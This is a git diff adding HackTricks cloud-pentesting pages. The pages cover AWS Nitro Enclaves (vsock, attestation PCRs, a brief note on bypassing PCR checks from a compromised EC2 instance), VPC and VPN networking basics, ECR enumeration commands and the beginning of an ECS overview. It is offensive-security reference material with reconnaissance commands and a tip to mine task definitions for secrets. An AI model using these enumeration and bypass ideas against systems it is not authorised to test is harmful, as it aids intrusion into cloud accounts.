+echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000
+```
+
+### Vsock Proxy
+
+The tool vsock-proxy allows to proxy a vsock proxy with another address, for example:
+
+```bash
+vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml
+```
+
+This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`:
+
+```yaml
+allowlist:
+- {address: ip-ranges.amazonaws.com, port: 443}
+```
+
+It's possible to see the vsock addresses (**`<CID>:<Port>`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port):
+
+{% code overflow="wrap" %}
+```bash
+sudo ss -l -p -n | grep v_str
+v_str LISTEN 0      0                                                                              3:8001                   *:*     users:(("vsock-proxy",pid=9458,fd=3))           
+```
+{% endcode %}
+
+## Nitro Enclave Atestation & KMS
+
+The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF.
+
+From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values:
+
+<table><thead><tr><th width="97">PCR</th><th width="221">Hash of ...</th><th>Description</th></tr></thead><tbody><tr><td>PCR0</td><td>Enclave image file</td><td>A contiguous measure of the contents of the image file, without the section data.</td></tr><tr><td>PCR1</td><td>Linux kernel and bootstrap</td><td>A contiguous measurement of the kernel and boot ramfs data.</td></tr><tr><td>PCR2</td><td>Application</td><td>A contiguous, in-order measurement of the user applications, without the boot ramfs.</td></tr><tr><td>PCR3</td><td>IAM role assigned to the parent instance</td><td>A contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.</td></tr><tr><td>PCR4</td><td>Instance ID of the parent instance</td><td>A contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.</td></tr><tr><td>PCR8</td><td>Enclave image file signing certificate</td><td>A measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.</td></tr></tbody></table>
+
+You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**.
+
+{% hint style="success" %}
+Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail.
+{% endhint %}
+
+### PCR Bypass
+
+From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement).
+
+Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections.
+
+The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO.
+
+## References
+
+* [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0)
+* All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
new file mode 100644
index 0000000000..2f490c3e88
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
@@ -0,0 +1,219 @@
+# AWS - VPC & Networking Basic Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Networking in a Nutshell
+
+A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**).
+
+This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**.
+
+Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**.
+
+Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**.
+
+Moreover, in order to **access Internet**, there are some interesting configurations to check:
+
+* A **subnetwork** can **auto-assign public IPv4 addresses**
+* An **instance** created in the network that **auto-assign IPv4 addresses can get one**
+* An **Internet gateway** need to be **attached** to the **VPC**
+  * You could also use **Egress-only internet gateways**
+* You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**.
+  * The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs)
+
+![](<../../../../.gitbook/assets/image (274).png>)
+
+## VPC
+
+Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs...
+
+### Subnets
+
+Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.
+
+* Valid CIDR are from a /16 netmask to a /28 netmask.
+* A subnet cannot be in different availability zones at the same time.
+* **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
+* It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
+
+<figure><img src="https://lh5.googleusercontent.com/N_WTrTrDAHwN61FMKJvLSHVua2EM0IazHH1fSTg8JQfTChm-dLN9mn7wkjz2MlpD-uOUqtWdMZpqKOp4VxaHy5-5X66GD1K8y1UGc27r-GbHdFty9ImpXdcjEsC7u4vjxKme_B_HwDOUnG6camxENYECTw=s2048" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="https://lh3.googleusercontent.com/MmjfVzGmV4jM7tO8lVoTKONoeqbq6E40DGeKUoo4kN-lmMDKnEiGNB-gGVx3EvjK9UV844im225CA8aAjomHf1Modt3MramHrHZdEGbeSZncWhVuT9R8f7tQZ2pXjdSJxeNfErmJ-0mmcUaV6dcU0TAd2A=s2048" alt=""><figcaption></figcaption></figure>
+
+### Route Tables
+
+Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the:
+
+* Local VPC
+* NAT
+* Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet).
+  * In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC.
+* VPC endpoints (to access S3 from private networks)
+
+In the following images you can check the differences in a default public network and a private one:
+
+<figure><img src="https://lh3.googleusercontent.com/q4ASpcLAYqijdNMLhMLl8EoowDtTMU5I_7YCVfk7-5hxDyeQOik9ImHnD2SYy32XUA2qXjEbXTAxA1lP--znJASdhYOdBveDcrD42f9XBKZ3EmjJCazN3YPLC6oS0xtRMmfORuwCszmMt-KrAkH07_izwg=s2048" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="https://lh5.googleusercontent.com/30psylXAI0gRN6_LK-reP00aGIlMma64E1qafCVPunn6nS-y5jAO6Y2JiempKcf6-LFi7ScicYcOh7BbHEya2VWtksnFX_8SPXQf97tKkg2tNZzrArWbiDCCn2m2LP1QUq6MZ_KayH3yir7t8zpO7CEQOw=s2048" alt=""><figcaption></figcaption></figure>
+
+### ACLs
+
+**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges.
+
+* It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections
+* However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed
+
+### Security Groups
+
+Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\
+Usually this is used to open dangerous ports in instances, such as port 22 for example:
+
+<figure><img src="https://lh5.googleusercontent.com/LliB7eb3cYfkEyOpyw1-eYgWsn2kq1yF6uRn5VYndvOuTvDlURimYx9UvuK8F2impTLmx50mid4MdTXE-Ljt2i_rxaIfnKUdji_hFjCdU9tdoW-axng9-W4tSL71gbbjrPQ7IYY5lAdH_G3UoMRMGGGOxQ=s2048" alt=""><figcaption></figcaption></figure>
+
+### Elastic IP Addresses
+
+An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account.
+
+### Connection between subnets
+
+By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on.
+
+**A local route within a route table enables communication between VPC subnets.**
+
+If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
+
+### VPC Peering
+
+VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
+
+Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
+If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
+Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
+
+### **VPC Flow Logs**
+
+Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
+
+Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**.
+
+Limitations:
+
+* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account.
+* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces
+* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one.
+* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server.
+* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service.
+* Traffic relating to an Amazon Windows activation license from a Windows instance
+* Traffic between a network load balancer interface and an endpoint network interface
+
+For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
+
+## VPN
+
+### Basic AWS VPN Components
+
+1. **Customer Gateway**:
+   * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
+   * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
+   * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
+   * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
+2. **Virtual Private Gateway**:
+   * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
+   * It is attached to your VPC and serves as the target for your VPN connection.
+   * VPG is the AWS side endpoint for the VPN connection.
+   * It handles the secure communication between your VPC and your on-premises network.
+3. **Site-to-Site VPN Connection**:
+   * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
+   * This type of connection requires a Customer Gateway and a Virtual Private Gateway.
+   * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
+   * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
+4. **Client VPN Endpoint**:
+   * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
+   * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
+   * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
+   * With Client VPN, each client device uses a VPN client software to establish a secure connection.
+
+### Site-to-Site VPN
+
+**Connect your on premisses network with your VPC.**
+
+* **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
+*   **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
+
+    Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.
+* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.
+* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.
+* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
+* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
+
+#### Limitations
+
+* IPv6 traffic is not supported for VPN connections on a virtual private gateway.
+* An AWS VPN connection does not support Path MTU Discovery.
+
+In addition, take the following into consideration when you use Site-to-Site VPN.
+
+* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
+
+### Client VPN <a href="#what-is-components" id="what-is-components"></a>
+
+**Connect from your machine to your VPC**
+
+#### Concepts
+
+* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
+* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
+* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
+* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
+* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
+* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
+* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
+* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
+* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
+* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
+
+#### Limitations
+
+* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
+* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
+* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
+* The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
+* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
+* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
+* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
+* Client VPN supports **IPv4** traffic only.
+* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
+*   If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format.
+
+    ```
+    SCRV1:<base64_encoded_string>:<base64_encoded_string>
+    ```
+* The self-service portal is **not available for clients that authenticate using mutual authentication**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
new file mode 100644
index 0000000000..f33f7488f1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
@@ -0,0 +1,131 @@
+# AWS - ECR Enum
+
+## AWS - ECR Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### ECR
+
+#### Basic Information
+
+Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
+
+ECR is compose by 2 types of objects: **Registries** and **Repositories**.
+
+**Registries**
+
+Every AWS account has 2 registries: **Private** & **Public**.
+
+1. **Private Registries**:
+
+* **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.
+  * The URI of a **private repository** follows the format `<account_id>.dkr.ecr.<region>.amazonaws.com/<repo-name>`
+* **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.
+* **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS...
+* **Other private registry options**:
+  * The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images.
+  * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions.
+  * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**.
+  * Specific **IAM policies** can be configured to grant different **permissions**.
+  * The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo.
+
+2. **Public Registries**:
+
+* **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.**
+  * The URI of a **public repository** is like `public.ecr.aws/<random>/<name>`. Although the `<random>` part can be changed by the admin to another string easier to remember.
+
+**Repositories**
+
+These are the **images** that in the **private registry** or to the **public** one.
+
+{% hint style="info" %}
+Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**.
+{% endhint %}
+
+#### Registry & Repository Policies
+
+**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image:
+
+<figure><img src="../../../.gitbook/assets/image (280).png" alt=""><figcaption></figcaption></figure>
+
+#### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get repos
+aws ecr describe-repositories
+aws ecr describe-registry
+
+# Get image metadata
+aws ecr list-images --repository-name <repo_name>
+aws ecr describe-images --repository-name <repo_name>
+aws ecr describe-image-replication-status --repository-name <repo_name> --image-id <image_id>
+aws ecr describe-image-scan-findings --repository-name <repo_name> --image-id <image_id>
+aws ecr describe-pull-through-cache-rules --repository-name <repo_name> --image-id <image_id>
+
+# Get public repositories
+aws ecr-public describe-repositories
+
+# Get policies
+aws ecr get-registry-policy
+aws ecr get-repository-policy --repository-name <repo_name>
+```
+{% endcode %}
+
+#### Unauthenticated Enum
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md" %}
+[aws-ecr-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+#### Privesc
+
+In the following page you can check how to **abuse ECR permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-ecr-privesc.md" %}
+[aws-ecr-privesc.md](../aws-privilege-escalation/aws-ecr-privesc.md)
+{% endcontent-ref %}
+
+#### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %}
+[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md)
+{% endcontent-ref %}
+
+#### Persistence
+
+{% content-ref url="../aws-persistence/aws-ecr-persistence.md" %}
+[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
new file mode 100644
index 0000000000..198b4e8561
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
@@ -0,0 +1,108 @@
+# AWS - ECS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECS
+
+### Basic Information
+
+Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**.
+
+ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**.
+
+* **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”.
+* **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups.
+  * There **2 types of applications**:
+    * **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application.
+    * **Task**: A standalone task that runs and terminates. For example, a batch job.
+  * Among the service applications, there are **2 types of service schedulers**:
+    * [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node.
+    * [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.
+* **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**...
+  * Check **env variables for sensitive info**!
+
